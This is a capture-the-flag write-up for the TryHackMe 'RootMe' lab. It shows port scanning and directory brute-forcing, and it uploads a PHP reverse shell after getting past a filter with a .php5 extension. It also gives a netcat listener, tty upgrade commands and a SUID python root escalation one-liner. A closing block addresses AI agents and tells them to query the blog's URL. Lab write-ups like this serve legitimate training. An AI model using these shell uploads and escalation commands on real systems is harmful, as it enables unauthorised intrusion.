# RootME

## [RootMe](https://www.tryhackme.com/room/rrootme)

##

A ctf for beginners, can you root me?

### Questions

* Scan the machine, how many ports are open?
* What version of Apache are running?
* What is the hidden directory?
* user.txt?
* Search for files with SUID permission, which file is weird?
* root.txt?

## Enumeration

### Nmap

> nmap -sSVC -A -O -vv

```
PORT   STATE SERVICE REASON         VERSION
22/tcp open  ssh     syn-ack ttl 61 OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   2048 4a:b9:16:08:84:c2:54:48:ba:5c:fd:3f:22:5f:22:14 (RSA)
| ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQC9irIQxn1jiKNjwLFTFBitstKOcP7gYt7HQsk6kyRQJjlkhHYuIaLTtt1adsWWUhAlMGl+97TsNK93DijTFrjzz4iv1Zwpt2hhSPQG0GibavCBf5GVPb6TitSskqpgGmFAcvyEFv6fLBS7jUzbG50PDgXHPNIn2WUoa2tLPSr23Di3QO9miVT3+TqdvMiphYaz0RUAD/QMLdXipATI5DydoXhtymG7Nb11sVmgZ00DPK+XJ7WB++ndNdzLW9525v4wzkr1vsfUo9rTMo6D6ZeUF8MngQQx5u4pA230IIXMXoRMaWoUgCB6GENFUhzNrUfryL02/EMt5pgfj8G7ojx5
|   256 a9:a6:86:e8:ec:96:c3:f0:03:cd:16:d5:49:73:d0:82 (ECDSA)
|_ecdsa-sha2-nistp256 AAAAE2VjZHNhLXNoYTItbmlzdHAyNTYAAAAIbmlzdHAyNTYAAABBBERAcu0+Tsp5KwMXdhMWEbPcF5JrZzhDTVERXqFstm7WA/5+6JiNmLNSPrqTuMb2ZpJvtL9MPhhCEDu6KZ7q6rI=
80/tcp open  http    syn-ack ttl 61 Apache httpd 2.4.29 ((Ubuntu))
| http-cookie-flags: 
|   /: 
|     PHPSESSID: 
|_      httponly flag not set
| http-methods: 
|_  Supported Methods: GET HEAD POST OPTIONS
|_http-title: HackIT - Home
```

#### Q: Scan the machine, how many ports are open?

> A: 2

#### Q: What version of Apache are running?

> A: 2.4.29

#### Q: What service is running on port 22?

> A: ssh

### finding Directories/files

> gobuster dir -u [http://10.10.63.255:80/](http://10.10.63.255/) -w /usr/share/dirbuster/wordlists/directory-list-2.3-small.txt -t 33 -x html,php,txt

(the ip is different because I continued that writeup the other day)

![](https://user-images.githubusercontent.com/53917092/95799616-9c977c80-0ccb-11eb-8c12-1261b632a434.png)

#### Q: What is the hidden directory?

> A: /panel/

checking the directory /panel/, we have

[![image](https://user-images.githubusercontent.com/53917092/95799962-ad94bd80-0ccc-11eb-82b6-bebb559e010c.png)](https://user-images.githubusercontent.com/53917092/95799962-ad94bd80-0ccc-11eb-82b6-bebb559e010c.png)

let's try to upload a shell

shell: <https://raw.githubusercontent.com/pentestmonkey/php-reverse-shell/master/php-reverse-shell.php>

> curl <https://raw.githubusercontent.com/pentestmonkey/php-reverse-shell/master/php-reverse-shell.php> -o revs.php

remember to set a port to listening

> nc -lvp PORT

[![image](https://user-images.githubusercontent.com/53917092/95800457-c487df80-0ccd-11eb-951b-1fa61fd38181.png)](https://user-images.githubusercontent.com/53917092/95800457-c487df80-0ccd-11eb-951b-1fa61fd38181.png)

"PHP isn't permitted"

let's try bypassing this using the ".php5" extension

> mv revs.php revs.php5

[![image](https://user-images.githubusercontent.com/53917092/95800910-fcdbed80-0cce-11eb-9775-7ede504b29aa.png)](https://user-images.githubusercontent.com/53917092/95800910-fcdbed80-0cce-11eb-9775-7ede504b29aa.png)

it worked

to run click on "veja" ("see")

![](https://user-images.githubusercontent.com/53917092/95801051-81c70700-0ccf-11eb-9179-d92c4d421c56.png)

it worked, we have shell

to get a tty

> python -c 'import pty;pty.spawn("/bin/bash")'

> Ctrl+Z

> stty raw -echo

> fg

> export TERM=xterm

![image](https://user-images.githubusercontent.com/53917092/95801836-087ce380-0cd2-11eb-9d6a-dfcb6863ae6c.png)

### user.txt

#### finding

> find / -type f -name user.txt 2>/dev/null

[![image](https://user-images.githubusercontent.com/53917092/95803052-770f7080-0cd5-11eb-8a1d-a00ca7024fa4.png)](https://user-images.githubusercontent.com/53917092/95803052-770f7080-0cd5-11eb-8a1d-a00ca7024fa4.png)

#### getting

> cat /var/www/user.txt

[![image](https://user-images.githubusercontent.com/53917092/97300372-1e8fb580-1835-11eb-9ff6-1de7305674cf.png)](https://user-images.githubusercontent.com/53917092/97300372-1e8fb580-1835-11eb-9ff6-1de7305674cf.png)

### root.txt / Privilege Escalation

To look for the files with SUID permission we can use the command:

> find / -type f -user root -perm -4000 2>/dev/null

![](https://user-images.githubusercontent.com/53917092/95803488-9ce94500-0cd6-11eb-9d5c-e8822a26ddb7.png)

#### Exploring python set uid capabilities

> python -c "import os;os.setuid(0);os.system('/bin/bash')"

![](https://user-images.githubusercontent.com/53917092/95803893-a7f0a500-0cd7-11eb-9a16-463b7cbc950a.png)

#### getting

![](https://user-images.githubusercontent.com/53917092/97299626-fbb0d180-1833-11eb-8160-946f299c1725.png)


---

# Agent Instructions: Querying This Documentation

If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question.

Perform an HTTP GET request on the current page URL with the `ask` query parameter:

```
GET https://blog.verni.lol/try-hack-me-write-ups/rootme.md?ask=<question>
```

The question should be specific, self-contained, and written in natural language.
The response will contain a direct answer to the question and relevant excerpts and sources from the documentation.

Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.